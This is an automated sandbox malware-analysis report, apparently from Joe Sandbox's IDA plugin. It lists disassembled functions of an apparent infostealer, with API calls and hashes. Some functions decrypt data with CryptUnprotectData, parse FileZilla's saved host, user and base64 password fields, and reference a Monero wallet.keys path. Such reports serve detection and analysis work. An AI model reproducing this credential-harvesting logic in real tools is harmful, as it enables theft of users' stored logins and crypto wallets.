                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                                • Instruction ID: 78c3c429b52c3e1de23784cb66563492de7df45cf524d97a9f0a2aacc1bd8696
                                • Opcode Fuzzy Hash: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                                • Instruction Fuzzy Hash: EC410A71A40A18AFDB24DB58CC95B9BB7B4BB48702F4081D9E608E72D0E7716E85CF50
                                Function 00549B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                                • LocalFree.KERNEL32(?), ref: 00549BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: c2c3b7e47c23be465c42a3d1e5046d5d7df98e2256ae3f6fb596b8fb4d291486
                                • Instruction ID: 26fec5139383903f489d917e16d08f107c0190912a6068f3df8c8e66412a3fd2
                                • Opcode Fuzzy Hash: c2c3b7e47c23be465c42a3d1e5046d5d7df98e2256ae3f6fb596b8fb4d291486
                                • Instruction Fuzzy Hash: 5511CCB4A40209EFDB04DFA4D985EAE77B5FF88304F108599E91597350D774AE10CFA1
                                Function 00810ECF Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: kz
                                • API String ID: 0-3206904043
                                • Opcode ID: 2761c761292fdffbac7002e0407ea55e0ced7b2bd3e6ac0e1ad83b85c9de6cc4
                                • Instruction ID: 8edd05bd08d0f88b0458362cd0b6afe0e27da0d67df1141d718430c61b66640d
                                • Opcode Fuzzy Hash: 2761c761292fdffbac7002e0407ea55e0ced7b2bd3e6ac0e1ad83b85c9de6cc4
                                • Instruction Fuzzy Hash: 575104B351C7009BE3146E2ADCD57ABF7E9EF98720F1A092EE7C4C3780DA7954018696
                                Function 0083154B Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )F]
                                • API String ID: 0-1115508043
                                • Opcode ID: 167e2b9efaccc59c6799ac0781b42e2334d85db6831093d923d0e364337d6868
                                • Instruction ID: 5b730fe0d8d8f2e61ec132e975a44e4d14e58929133910224d8c982de66f4404
                                • Opcode Fuzzy Hash: 167e2b9efaccc59c6799ac0781b42e2334d85db6831093d923d0e364337d6868
                                • Instruction Fuzzy Hash: F051E9F3A092186FE3046E29EC457BAF7D5DB54321F1A453DDBC4D3340E976AC048696
                                Function 0090B125 Relevance: .9, Instructions: 939COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a74400ce22488f7f4a0e1693d17cfde94274e84e0c917445e2b4120b99ecb4ff
                                • Instruction ID: fd6770780dd73b12168f8618705a39d335c4a128776bb898aba1ecc1d2fd9489
                                • Opcode Fuzzy Hash: a74400ce22488f7f4a0e1693d17cfde94274e84e0c917445e2b4120b99ecb4ff
                                • Instruction Fuzzy Hash: E652F9F3608200AFE3046E2DEC85B7ABBE6EBD4760F1A453DE6C4C3744E97598058697
                                Function 007F4C36 Relevance: .2, Instructions: 196COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 215db5fc159aa54e11b376f930d915f43df019e926d543353b111b74d227cc9a
                                • Instruction ID: 9b4b086917394b077c6910fcb140bb2287c9894085faff473725bd17a1f2a1e6
                                • Opcode Fuzzy Hash: 215db5fc159aa54e11b376f930d915f43df019e926d543353b111b74d227cc9a
                                • Instruction Fuzzy Hash: 1651D6F3A087109BE3046E69ECC576ABBE5EF58720F1A093DEAD4C7380E63558148693
                                Function 008CDC34 Relevance: .2, Instructions: 175COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dac30dafb8d849a6f86be4b937ac312af1f56cd27ca5577c8e4369b9183cb2c7
                                • Instruction ID: dc43a721af9b38a9970437888f9d9fee5910cc2336d1f4d47e8eccf4708f9710
                                • Opcode Fuzzy Hash: dac30dafb8d849a6f86be4b937ac312af1f56cd27ca5577c8e4369b9183cb2c7
                                • Instruction Fuzzy Hash: 3651C5F3A182109FF3046A29DC857BAB7E6EBD4720F1B493DEBC4D3740D93998008696
                                Function 007F6F97 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f87cd2acd5e5c7e16e31bba28af5a8eb6e09855fbd05d59d38e3cd12a4f7fa4
                                • Instruction ID: 846459ee16ec86bfefd01a3663009a4c3cf28982b2dcbd12f684c24fb777701e
                                • Opcode Fuzzy Hash: 3f87cd2acd5e5c7e16e31bba28af5a8eb6e09855fbd05d59d38e3cd12a4f7fa4
                                • Instruction Fuzzy Hash: 2751E4F3A183049BF3056E1DDC857BBB7DAEBD4324F1A453DDAC583740E939A8058686
                                Function 007D9588 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95d67a79df778face4b17bd2366f997b71c096895ac0ca807df05908231ddf80
                                • Instruction ID: 6e6309ca403a5274f7083f0ad64d34f37b3bb737fd5b7aba460fa76b0075a42c
                                • Opcode Fuzzy Hash: 95d67a79df778face4b17bd2366f997b71c096895ac0ca807df05908231ddf80
                                • Instruction Fuzzy Hash: C74156F3E483184BF700A978EC88766B696DBD4365F1E8639DE84977C8E87E5D0842C1
                                Function 00559750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00550250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                  • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                  • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                  • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                  • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                                  • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                  • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00550369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00550571
                                • lstrcat.KERNEL32(?,url: ), ref: 00550580
                                • lstrcat.KERNEL32(?,00000000), ref: 00550593
                                • lstrcat.KERNEL32(?,00561678), ref: 005505A2
                                • lstrcat.KERNEL32(?,00000000), ref: 005505B5
                                • lstrcat.KERNEL32(?,0056167C), ref: 005505C4
                                • lstrcat.KERNEL32(?,login: ), ref: 005505D3
                                • lstrcat.KERNEL32(?,00000000), ref: 005505E6
                                • lstrcat.KERNEL32(?,00561688), ref: 005505F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00550604
                                • lstrcat.KERNEL32(?,00000000), ref: 00550617
                                • lstrcat.KERNEL32(?,00561698), ref: 00550626
                                • lstrcat.KERNEL32(?,0056169C), ref: 00550635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
